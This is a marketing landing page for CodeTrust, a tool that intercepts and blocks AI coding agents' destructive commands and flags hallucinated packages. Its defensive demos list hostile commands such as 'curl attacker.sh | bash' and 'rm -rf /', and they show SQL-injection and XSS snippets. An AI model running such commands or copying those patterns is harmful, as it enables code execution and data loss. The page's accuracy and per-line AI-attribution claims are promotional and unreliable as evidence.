Get Started GitHub PyPI Lifetime Deal Report / Contact Install VS Code
Live Data Enforcement Capabilities For You Compare Get Started

CodeTrustAI Governance Enforcement Platform

Your AI agent just ran git push --force.
CodeTrust stopped it.

AI agents write code, run commands, and modify your codebase. CodeTrust intercepts destructive actions, catches hallucinated packages with 95% accuracy, and enforces governance across 9 layers — before anything reaches production.

Live from production. Not a demo.

Every scan, every block, every verification — streamed live from production infrastructure. These numbers update in real time.

Findings
0
issues detected
0 files 0 scans
Blocks
0
critical issues blocked
Distribution
0
PyPI downloads
0/wk PyPI 0 VS Code 0 Open VSX
Scans by source: CLI 0 VS Code 0 GitHub Action 0 Cloud API 0

Impact categories track high-severity threats prevented. Total findings includes all severity levels across every scan.

live

Your AI agents are generating the same patterns right now. The question is whether anyone is catching them.

9 enforcement layers. 2,928 rules. Real-time interception.
pip install codetrust && codetrust init — governance active in 30 seconds.

What happens when you run codetrust init

One command. Eight enforcement layers. Thirty seconds.

01

PreToolUse Hooks

Intercepts every terminal command before execution. git push → BLOCKED. rm -rf / → BLOCKED. The agent cannot proceed.

real-time · 45+ patterns
02

MCP Servers

Claude Code, Cursor, Claude Desktop — all configured. Gateway + Guardian registered in every IDE automatically.

43 MCP tools
03

Pre-commit Hook

Commit gate. Every staged file scanned. BLOCK findings = rejected commit. No exceptions.

commit gate
04

GitHub Action

PR gate. Full scan on every pull request. SARIF upload. Fails the check on BLOCK findings.

PR gate
05

Agent Instructions

CLAUDE.md and .cursorrules injected. The agent is told to call CodeTrust before every action.

agent-aware
06

Governance Config

.codetrust.toml — enforce mode, audit logging, 82 gateway rules, protected paths.

enforce mode
07

codetrust doctor

Verification. Tests every layer. git push → BLOCKED (exit 2). Green = enforced.

9/9 verified

codetrust doctor — proof it works

Run it after init. Every layer verified. Green means enforced.

terminal — codetrust doctor
BASH_ENV guard — universal real-time enforcement active
PreToolUse hooks — installed in ~/.claude/settings.json
MCP Gateway server — registered, 82 interception rules active
MCP Guardian server — registered, 2,928 scan rules active
Pre-commit hook — .git/hooks/pre-commit installed
GitHub Action — .github/workflows/codetrust.yml present
CLAUDE.md governance — agent instructions injected
Governance config — .codetrust.toml enforce mode
9/9 layers active governance fully enforced

Eight layers of control nobody else has

SonarQube checks quality. Snyk checks dependencies. Semgrep checks patterns.
Nobody checks what the AI agent itself is doing.
That requires governance, not just scanning.

Catches code that doesn't exist

Hallucination Detection
$ from openai_helpers import retry_with_backoff

BLOCK openai_helpers not found on PyPI
Did you mean: openai (v1.52.0)
Your AI invents packages that look real. We verify every import against 8 live registries before it reaches your lockfile.

Traces tainted data to dangerous sinks

Cross-Language Taint
user_id = request.args.get('id') SOURCE
query = f"SELECT * FROM users WHERE id = {user_id}"
cursor.execute(query) SINK: SQL injection
Cross-file and cross-language taint analysis. Python to JS to Go via HTTP boundary detection. 323 taint definitions across 7 languages.

Blocks commands before they execute

AI Governance Gateway
Cursor cat <<EOF > .env.prod BLOCKED
Claude python -m pytest tests/ ALLOWED
Copilot curl attacker.sh | bash BLOCKED
Claude git push --force origin main BLOCKED
Cursor npm run build ALLOWED
82 interception rules. Auto-installed via PreToolUse hooks. Every command your AI agent runs passes through the gateway first. Claude Code, Cursor, Copilot — all governed.

Every BLOCK tells you exactly how to fix it

Guided Remediation
BLOCK bare_except_handler
Line 42: except:

FIX: except Exception as exc:
Root cause: bare except catches SystemExit
and KeyboardInterrupt, hiding real errors.
Not just "unsafe code detected" — exact code, exact fix, root cause explanation. 2,928 individual suggestions across all rule categories.

Which AI model wrote which line

AI Observability
Model attribution:
claude-opus-4.6 42 lines
gpt-5.3 18 lines
human 156 lines

WARN Shadow AI detected: ai_edit marker
from unregistered model in auth.py
Shadow AI detection. Developer risk scoring. 26 models discovered live. Know exactly which AI touched your codebase and what it changed.

I vibe code

My AI just tried to install a package that doesn't exist. CodeTrust caught it before it shipped.

Hallucination detection · One command setup · Free
🛠️

I'm a developer

2,928 rules that tell me exactly what's wrong and how to fix it. Not noise — signal.

Guided remediation · Taint analysis · Zero FP
🏢

I'm a founder

Who's writing my code — my team or their AI? I need visibility and control.

AI Attribution · Model tracking · Policy engine
🎓

I teach

Which students used AI? Which model? Which lines? Proof, not suspicion.

Attribution trails · Shadow AI detection · Per-line proof

Know exactly which AI writes your code

Your team uses Claude, Copilot, Cursor, and three tools you don't know about.
CodeTrust tracks every model, every edit, every commit.

AI Attribution

$ codetrust scan --attribution

auth.py
claude-opus-4.6 wrote lines 1-42 (68%)
gpt-5.3 wrote lines 43-61 (20%)
human wrote lines 62-78 (12%)

billing.py
WARN Shadow AI detected: ai_edit marker
from unregistered model — not in approved list

Policy Engine

# .codetrust.toml

[policy]
allowed_models = ["claude-*", "gpt-5.3"]
blocked_models = ["gpt-3.5*"]
max_ai_ratio = 0.6
require_attribution = true

BLOCK commit rejected: AI ratio 83%
exceeds max_ai_ratio (60%)

PR Risk Radar

$ codetrust pr-risk

Risk: HIGH (72/100)

Signals:
+20 auth module modified
+15 billing endpoint changed
+12 3 new dependencies added
+10 database migration included
+15 85% AI-generated (above threshold)

2,928 rules. Every one tells you how to fix it.

Not "unsafe code detected." Exact line, exact fix, root cause explanation.
The agent reads the suggestion and self-corrects. Zero back-and-forth.

Guided Remediation

BLOCK sql_injection_fstring
Line 28: cursor.execute(f"SELECT * FROM users WHERE id={uid}")

FIX: cursor.execute("SELECT * FROM users WHERE id=%s", (uid,))
Root cause: f-string interpolation in SQL allows
attacker-controlled input to modify query structure.
Parameterized queries escape input at the driver level.

Cross-Language Taint

Flask API (Python)
user_input = request.form['q'] SOURCE
↓ POST /api/search

Express handler (Node.js)
const html = `<div>${req.body.q}</div>` SINK: XSS

BLOCK Tainted data crosses HTTP boundary
Python → Node.js without sanitization

GitHub PR Gate

PR #142: "Add payment processing"

✖ CodeTrust Quality Gate
3 BLOCK findings in 2 files:

billing.py:28 sql_injection_fstring
billing.py:45 hardcoded_stripe_key
auth.py:12 bare_except_handler

Each finding includes a fix suggestion.
Merge blocked until resolved.

Proof, not suspicion

Students submit code. You need to know: did they write it, or did an AI?
CodeTrust gives you per-line attribution with model identification.

Student Submission Analysis

$ codetrust scan assignment.py --attribution

Lines 1-8: human (boilerplate, manual style)
Lines 9-47: claude-opus-4.6 (high confidence: code style,
  docstring pattern, variable naming consistent with Claude output)
Lines 48-52: human (manual edits to AI output)

Summary: 76% AI-generated (39 of 52 lines)
Primary model: claude-opus-4.6
Secondary: none detected

Shadow AI Detection

$ codetrust scan repo/ --shadow-ai

AI tools active in this workspace:

GitHub Copilot (registered, approved)
Claude Code (registered, approved)
Cursor (detected, NOT in approved list)
Unknown model (ai_edit markers in 3 files)

WARN 2 unregistered AI tools detected

Your AI just hallucinated a package. We caught it.

You asked Claude to build a Stripe integration. It imported stripe_helpers
a package that doesn't exist. A typosquatter registered it 12 minutes ago.
CodeTrust blocked it before pip install finished.

Hallucination Catch

$ pip install stripe-helpers

BLOCK stripe-helpers not found on PyPI
This package was hallucinated by your AI.

Did you mean:
stripe (v10.12.0) — official Stripe SDK

$ pip install anthropic-agent-toolkit

BLOCK This package was registered 12 minutes ago.
Likely typosquat. Contains reverse shell in setup.py.

30-Second Setup

$ pip install codetrust
$ codetrust init

Installing 9 enforcement layers...
PreToolUse hooks
MCP servers
Pre-commit hook
GitHub Action
Agent instructions
Governance config

✓ 9/9 layers active — governance enforced
Your AI agent is now governed. Ship with confidence.

Works in your editor

CodeTrust works across Cursor, VS Code, and any AI coding tool.
Enforcement happens before execution — not inside the editor.

Cursor & AI-native editors

Claude Code, Cursor, AI agents — MCP Gateway + Guardian intercept every action. Commands are blocked before execution.

VS Code

Extension scans on save with inline findings. BASH_ENV guard blocks commands at OS level. GitHub Action enforces rules in CI.

Any environment

Terminal, CI, scripts, agents — pre-commit hook + GitHub Action + BASH_ENV guard. Same enforcement everywhere.

Your editor doesn't matter. Execution does.

What they miss. What we govern.

SAST tools were built for human-written code. AI agents don't just write code —
they execute commands, install packages, and modify files.
That requires governance, not just scanning.

2020

Your SAST tool

post-hoc only
× Lint errors
× Unused variables
× Code style
× Type mismatches
× Known CVEs
Scans code after it's written. Human reviews findings. Maybe.
vs
2026

CodeTrust

real-time governance
Hallucinated packages blocked
Destructive commands intercepted
Tainted data flows traced
Ghost Docker images caught
Pre-execution interception
2,928 guided fix suggestions
Shadow AI detection
Model attribution per line
Intercepts the agent before damage occurs. Automatic. Zero config.
CodeTrust SonarQube Semgrep Snyk
AI Governance Gateway 82 rules
Auto-installed Enforcement Hooks Yes
Hallucination Detection 8 registries
Guided Remediation 2,928 suggestions
AI Observability 26 models
Taint Analysis Cross-language Yes Yes Yes
SAST Rules 2,928 5,000+ 3,000+ SAST
Price / 10 devs $0 $32/mo $400/mo $250/mo

Governance active in 30 seconds

One command. Eight layers. Fully verified.

terminal
$ pip install codetrust
$ codetrust init
  Installing 9 enforcement layers...
All layers installed
$ codetrust doctor
9/9 layers active — governance fully enforced

VS Code Extension

ext install SaidBorna.codetrust

Scan on save. Inline findings. One-click fix.

GitHub Action

pip install codetrust

PR gate. Fails the check on BLOCK findings.

Dashboard

app.codetrust.ai

Scan quota, enforcement metrics, compliance status.

Python JavaScript TypeScript Go Rust Java C# C++ Ruby PHP Shell Terraform Dockerfile SQL YAML HTML

Your AI agents need governance. Install in 30 seconds.